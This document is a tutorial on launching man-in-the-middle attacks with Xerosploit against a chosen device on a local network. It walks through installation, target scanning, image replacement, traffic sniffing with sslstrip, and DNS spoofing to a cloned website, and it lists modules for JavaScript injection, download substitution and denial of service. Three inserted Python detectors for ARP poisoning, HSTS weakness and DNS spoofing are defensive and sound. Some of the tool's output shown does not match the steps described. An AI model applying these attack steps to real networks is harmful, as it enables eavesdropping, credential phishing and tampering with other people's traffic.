
Launch Advanced Man in the Middle Attacks with Xerosploit

A Man-in-the-Middle (MitM) attack involves a hacker infiltrating a network, compelling nearby devices to connect directly to their machine. This allows them to eavesdrop on traffic and manipulate data. While Bettercap is a commonly used tool for MitM attacks, Xerosploit takes automation to the next level, streamlining high-level functions that would typically require more configuration in Bettercap.

Xerosploit's Foundation: Built upon tools like Bettercap and Nmap, Xerosploit automates their functions, enabling users to execute advanced concepts with just a few commands. This integration simplifies the execution of sophisticated attacks, making it more accessible for cybersecurity enthusiasts.

Considerations and Limitations: Xerosploit, while powerful, may not guarantee success in every scenario. Some webpages might be resistant to spoofing, especially if the target uses HTTPS or routes traffic through a VPN. Given that 73% of websites now utilize HTTPS, successful manipulation is limited to the remaining 27%, and only when VPNs are not in use.
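The "compelling nearby devices to connect directly to their machine" step above is ARP cache poisoning, the same technique Bettercap performs underneath Xerosploit. From the defender's side it leaves a visible trace: the gateway's IP suddenly maps to a different MAC, and one MAC starts answering for more than one IP. The following detector is an added example written for this article, not code from Xerosploit or Bettercap; the ARP replies it inspects are constructed, and on a real host you would feed it the sender IP/MAC pairs from `tcpdump -n arp` or a capture library.

```python
"""Detect ARP cache poisoning from a stream of observed ARP replies.

Added example, not part of Xerosploit. The replies below are constructed
to mimic an attacker at cc:cc:cc:cc:cc:99 impersonating both the gateway
(192.168.32.1) and a client (192.168.32.7) from t=5.0 onwards.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float   # seconds since the capture started
    ip: str     # "sender IP" field of the ARP reply
    mac: str    # "sender MAC" field of the ARP reply


# Constructed capture (not real traffic).
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.168.32.1", "aa:aa:aa:aa:aa:01"),
    ArpReply(1.0, "192.168.32.7", "bb:bb:bb:bb:bb:07"),
    ArpReply(2.0, "192.168.32.1", "aa:aa:aa:aa:aa:01"),
    ArpReply(5.0, "192.168.32.1", "cc:cc:cc:cc:cc:99"),  # gateway MAC flips
    ArpReply(5.1, "192.168.32.7", "cc:cc:cc:cc:cc:99"),  # same MAC claims the client
    ArpReply(6.0, "192.168.32.1", "cc:cc:cc:cc:cc:99"),
]


def detect_arp_spoofing(replies, trusted=None):
    """Return a list of alert strings for suspicious ARP replies.

    Two heuristics are applied:
      1. an IP whose MAC differs from the first value seen (or from a
         trusted static mapping) is reported as a flip, once per reply;
      2. a single MAC answering for two or more IPs in the capture is
         reported, because a MitM host has to impersonate both ends.
    `trusted` is an optional {ip: mac} dict of known-good mappings, for
    example the gateway's real MAC taken from the router's label.
    """
    known = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ips_by_mac = defaultdict(set)
    alerts = []
    for r in replies:
        mac = r.mac.lower()
        prev = known.get(r.ip)
        if prev is None:
            known[r.ip] = mac            # first sighting becomes the baseline
        elif prev != mac:
            alerts.append(f"t={r.ts:.1f}: {r.ip} changed from {prev} to {mac}")
        ips_by_mac[mac].add(r.ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_REPLIES):
        print(line)
```

The baseline is the first mapping seen, so the detector is only as good as the moment it starts; pinning the gateway through `trusted` removes that trust-on-first-use gap. Seeded with the constructed capture, it reports the three poisoned replies and the one MAC that claims two addresses.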

Requirements: Xerosploit has been tested on Ubuntu and Kali Linux, and while it may work on macOS, it's explicitly designed for "Ubuntu / Kali Linux / Others" and "Parrot OS" during installation. Additionally, ensure your computer has the latest version of Python installed to run Xerosploit effectively.

This article will guide you through the installation process and showcase the capabilities of Xerosploit in executing advanced Man-in-the-Middle attacks on compatible systems.

 

Step 1:  Install Xerosploit

First, clone Xerosploit from GitHub using git clone.

~$ git clone https://github.com/LionSec/xerosploit
Cloning into 'xerosploit' ...
remote: Enumerating objects: 306, done.
remote: Total 306 (delta 0), reused 0 (delta 0), pack-reused 306
Receiving objects: 100% (306/306), 793.28 KiB | 2.38 MiB/s, done.
Resolving deltas: 100% (68/68), done.

Then, change into its directory (cd) and start the installer using Python. It will ask you to select your operating system; if using Kali Linux, choose 1 and hit enter.

~$ cd xerosploit && sudo python install.py
[++] Please choose your operating system.
1) Ubuntu / Kali Linux / Others
2) Parrot OS
>>> 1
[++] Insatlling Xerosploit ......
Xerosploit has been successfully installed. Execute 'xerosploit' in your termninal.

 

Step 2:  Install the Dependencies

For Xerosploit to do its job correctly, you'll need all of the tools that it built its service on top of, including Nmap, hping3, build-essential, ruby-dev, libpcap-dev, and libgmp3-dev. If you're using Kali, you probably already have all of these.  

~/xerosploit$ sudo apt install nmap hping3 build-essential ruby-dev libpcap-dev libgmp3-dev
Reading package lists ... Done
Building dependency try ... Done
Reading state information ... Done
build-essential is already the newest version (12.9).
build-essential set to manually installed.
hping3 is already the newest version (3.a2.ds2-10).
hping3 set to manually installed.
nmap is already the newest version (7.91+dfsg1-1kali1).
nmap set to manually installed.
ruby-dev is already the newest version (1:2.7+2).
ruby-dev set to manually installed.
libpcap-dev is already the newest version (1.9.1-r0).
libpcap-dev set to manually installed.
libgmp3-dev is already the newest version (2:6.0.0+dfsg-6).
libgmp3-dev set to manually installed.

And use Python to install tabulate and terminaltables, which will let Xerosploit display information to you in an easy-to-read way. You likely already have these tools too.

~/xerosploit$ sudo pip3 install tabulate terminaltables
Requirement already satisfied: tabulate in /usr/lib/python3/dist-packages (0.8.7)
Requirement already satisfied: terminaltables in /usr/lib/python3/dist-packages (3.1.0)

 

Step 3:  View Xerosploit's Commands

Start Xerosploit with the xerosploit command. Right away, it will show you information on your network configuration.

~/xerosploit$ sudo xerosploit
[+] Please type 'help' to view commands.
Xero ➮

Type help to see all of the commands available in Xerosploit.

Xero ➮ help
[+] Please type 'help' to view commands.
Xero ➮

 

Step 4: Run a Scan to Identify Targets

First, we'll do some recon to identify a target by running the scan command, which runs on top of Nmap.

Xero ➮ scan
[++} Mapping your network ...
[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.
Xero ➮

You should see a list of IP addresses returned, and if all went well, one of those IP addresses should be the one you want to target. So, type in the IP address of the device you want to target. For me, it's the "kunshan" device.

Xero ➮ 192.168.32.7
[++] 192.168.32.7 ha been targeted.
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮

Now, it will ask you which module you want to run against the target. If you don't know the module you want, type help to see a complete list.

Xero»modules ➮ help
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮

 

Step 5: Replace All Images in the Target's Browser

Now, let's test out another module. If a module is already loaded (in this example, shakescreen), type back and enter to return to the module selection screen.

Xero»modules»shakescreen ➮ back
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮

Xerosploit has a fun attack tool called replace that will let us swap out all of the images loading on an HTTP-based webpage with any picture that we want.

Xero»modules ➮ replace
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘
[+] Enter 'run' to execute the 'replace' command.
Xero»modules»replace ➮

To start the Image Replace tool, type run, and it will immediately ask you to add the picture's path.

Xero»modules»replace ➮ run
[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)
Xero»modules»replace ➮

Find an image on your computer, then either type out the path or drag-and-drop the image into the terminal window to auto-populate it. Hit enter to start the attack.

Xero»modules»replace ➮ /root/Desktop/bg.png
[++] All images will be replaced by /root/Desktop/bg.png
[++] Press 'Ctrl + C' to stop .

Whenever an HTTP-based webpage loads on the target browser, all of its images will be replaced with the one image we chose. It doesn't always work 100%, so a few images may slip by unchanged, and it can be a little slow depending on the connection speed, but in general, it works pretty well.

It will continue to happen on every HTTP page until you stop the attack.

^C
Stopping MITM attack  ...
[+] Enter 'run' to execute the 'replace' command.
Xero»modules»replace ➮

 

Step 6: Capture Data Over the Network

Let's try another module. To return to the module selection screen, type back and enter.

Xero»modules»replace ➮ back
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮

With the sniff module, we can capture some general data over the network.

Xero»modules ➮ sniff
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Sniffing                           █
█                                                              █
█      Capturing any data passed over your local network       █
└══════════════════════════════════════════════════════════════┘
[+] Please type 'run' to execute the 'sniff' command.
Xero»modules»sniff ➮

Once the Sniffing tool is selected, type run to begin sniffing. It will then ask you if you want to load sslstrip, which will attempt to downgrade HTTPS connections to plain HTTP so that data that would otherwise be encrypted can be read.

Xero»modules»sniff ➮ run
[+] Do you want to load sslstrip ? (y/n).
Xero»modules»sniff ➮ y
[++] All logs are saved on : /opt/xerosploit/xerosniff
[++] Sniffing on 192.168.8.215
[++] sslstrip : ON
[++] Press 'Ctrl + C' to stop .
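sslstrip only works when the browser can be kept on plain HTTP, which is exactly what HTTP Strict Transport Security (HSTS, RFC 6797) prevents: once a browser has seen a valid policy over HTTPS it refuses to load that host over HTTP for `max-age` seconds. The checker below is an added example written for this article, not part of Xerosploit; the response headers it grades are constructed. Thresholds (one year, subdomain coverage, preload) are assumptions that follow common deployment guidance rather than anything in the RFC.

```python
"""Grade a site's Strict-Transport-Security header as a defence against
sslstrip-style downgrades. Added example; not part of Xerosploit."""

ONE_YEAR = 365 * 24 * 3600  # assumed minimum max-age for a "good" policy


def parse_hsts(value):
    """Parse an HSTS header value into its directives (case-insensitive).

    Raises ValueError when max-age is present but not a non-negative integer.
    """
    result = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        directive = directive.strip()
        if not directive:
            continue
        name, _, arg = directive.partition("=")
        name = name.strip().lower()
        arg = arg.strip().strip('"')
        if name == "max-age":
            if not arg.isdigit():
                raise ValueError(f"max-age must be a non-negative integer, got {arg!r}")
            result["max_age"] = int(arg)
        elif name == "includesubdomains":
            result["include_subdomains"] = True
        elif name == "preload":
            result["preload"] = True
    return result


def assess_hsts(headers):
    """Return (grade, reason) for a dict of HTTPS response headers.

    Header names are matched case-insensitively. Grades, from worst to best:
    missing, invalid, disabled, weak, partial, good, strong.
    """
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), None)
    if value is None:
        return ("missing", "no Strict-Transport-Security header: the browser "
                           "may follow an http:// link to this host")
    try:
        hsts = parse_hsts(value)
    except ValueError as exc:
        return ("invalid", str(exc))
    if hsts["max_age"] is None:
        return ("invalid", "max-age directive is required")
    if hsts["max_age"] == 0:
        return ("disabled", "max-age=0 clears any stored policy")
    if hsts["max_age"] < ONE_YEAR:
        return ("weak", f"max-age {hsts['max_age']} is shorter than one year")
    if not hsts["include_subdomains"]:
        return ("partial", "subdomains are not covered by the policy")
    grade = "strong" if hsts["preload"] else "good"
    return (grade, f"max-age={hsts['max_age']}, subdomains covered, "
                   f"preload={'on' if hsts['preload'] else 'off'}")


# Constructed responses, not captured from any real site.
SAMPLE_RESPONSES = {
    "no-hsts":   {"Content-Type": "text/html"},
    "short":     {"Strict-Transport-Security": "max-age=3600; includeSubDomains"},
    "apex-only": {"strict-transport-security": "max-age=63072000"},
    "preloaded": {"Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"},
}

if __name__ == "__main__":
    for label, hdrs in SAMPLE_RESPONSES.items():
        grade, reason = assess_hsts(hdrs)
        print(f"{label:10} {grade:8} {reason}")
```

Even a strong header is trust-on-first-use: a client that has never visited the site over HTTPS has no policy yet, which is why the preload list exists and why the "missing" grade is the one sslstrip relies on.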

A new window should open to show all of the packets being intercepted and saved to your computer. In the window, you can easily see which websites the target is visiting and what data is being requested and sent.

When you're done sniffing packets, you can stop the attack with Control-C on your keyboard. Then, you'll be asked if you want to save the logs or not. Use Y for yes, N for no.

^C
Stopping MITM attack  ...
[+] Do you want to save logs ? (y/n).
Xero»modules»sniff ➮ n
[++] Logs have been removed.
[+] Please type 'run' to execute the 'sniff' command.
Xero»modules»sniff ➮

 

Step 7: Run the DNS Spoofing Module on a Target

If you want to re-route traffic to a specific IP address, the dspoof module can help. But first, you'll want to create a fake website to redirect others to on the network. So, visit a website you want to copy, save its HTML file, and rename it “index.html.”

Next, open a separate terminal window and navigate to the same folder as the index.html file. Run the following command to serve a local copy of the webpage, replacing the <your-ip> part with the IP address of your machine.

~$ sudo python3 -m http.server --bind <your-ip> 80

Then, return to the terminal window running Xerosploit. Go back to the module selection screen, load the dspoof module, and run it.

When asked, give your IP address as the address to redirect traffic to. All webpages that load will be the page you cloned!

Xero»modules»sniff ➮ back
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮ dspoof
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         DNS spoofing                         █
█                                                              █
█   Supply false DNS information to all target browsed hosts   █
█     Redirect all the http traffic to the specified one IP    █
└══════════════════════════════════════════════════════════════┘
[+] Please type 'run' to execute the 'dspoof' command.
Xero»modules»dspoof ➮ run
[+] Enter the IP address where you want to redirect the traffic.
[++] Redirecting all the traffic to your IP address.
[++] Press 'Ctrl + C' to stop .
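The dspoof module's own banner describes its footprint: every name the target looks up comes back as one IP, and that IP is the attacker's LAN address. Both properties are easy to check from the resolver side. The script below is an added example written for this article, not part of Xerosploit; the name/answer pairs are constructed, and the list of "local" name suffixes is an assumed site convention. In practice the pairs would come from a resolver's query log or a passive DNS sensor on the network.

```python
"""Spot DNS answers that look like LAN-level DNS spoofing.

Added example, not part of Xerosploit. Input is a list of
(queried name, answer IP) pairs; the sample data is constructed.
"""
import ipaddress
from collections import defaultdict

# Assumed convention: names under these suffixes legitimately live on the LAN.
LOCAL_SUFFIXES = (".local", ".lan", ".home", ".internal")

# Constructed resolver log: one LAN host answers for three public names.
SAMPLE_ANSWERS = [
    ("example.com", "93.184.216.34"),
    ("printer.lan", "192.168.32.20"),
    ("news.example.net", "192.168.32.5"),
    ("shop.example.org", "192.168.32.5"),
    ("mail.example.com", "192.168.32.5"),
]


def is_local_name(name):
    """True when the name is expected to resolve to a LAN address."""
    return name.lower().rstrip(".").endswith(LOCAL_SUFFIXES)


def find_dns_spoofing(answers, min_names=3):
    """Return alert strings for answers matching dspoof's two tell-tales.

    1. a non-local name resolving to a private, loopback or link-local
       address (ipaddress' is_private covers all three);
    2. one address answering for `min_names` or more distinct names.
    Unparseable answers are reported rather than silently skipped.
    """
    alerts = []
    names_by_ip = defaultdict(set)
    for name, ip_text in answers:
        try:
            ip = ipaddress.ip_address(ip_text)
        except ValueError:
            alerts.append(f"{name}: unparseable answer {ip_text!r}")
            continue
        names_by_ip[ip_text].add(name)
        if ip.is_private and not is_local_name(name):
            alerts.append(f"{name} resolved to private address {ip_text}")
    for ip_text, names in names_by_ip.items():
        if len(names) >= min_names:
            alerts.append(f"{ip_text} answers for {len(names)} unrelated names: "
                          f"{', '.join(sorted(names))}")
    return alerts


if __name__ == "__main__":
    for line in find_dns_spoofing(SAMPLE_ANSWERS):
        print(line)
```

The second heuristic is the more robust one: a single CDN edge can legitimately serve several names, but `min_names` distinct, unrelated domains collapsing onto one RFC 1918 address is the signature of a catch-all redirect rather than of hosting. Run against the constructed log it reports the three private answers and the shared address.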

 

Step 8: Explore Other Modules

Discover additional modules within Xerosploit, each offering unique functionalities that can be both intriguing and enjoyable to experiment with.

  • yplay: Seamlessly play a YouTube video in the background of web browsers.
  • injectjs: Inject JavaScript into websites loaded by others on the network.
  • injecthtml: Replace HTML content on websites loaded within the network.
  • dos: Deny internet access to a specific IP address.
  • pscan: Conduct a comprehensive port scan.
  • ping: Ping a targeted device.
  • rdownload: Substitute files being downloaded with your own.
  • deface: Replace every webpage with your customized HTML.

Xerosploit serves as a compelling example of the potential risks associated with connecting to unfamiliar networks. While a VPN provides a level of protection, it's crucial to recognize that attackers may still find ways to manipulate your traffic. Exercise utmost caution by employing additional safeguards, such as utilizing a VPN, whenever uncertainty surrounds the security of the network you intend to connect to.

I hope you found the How to Launch Advanced Man-in-the-Middle Attacks with Xerosploit article helpful! If you have any questions about this guide, please leave a comment below or reach out to me on Twitter @amrelsagaei
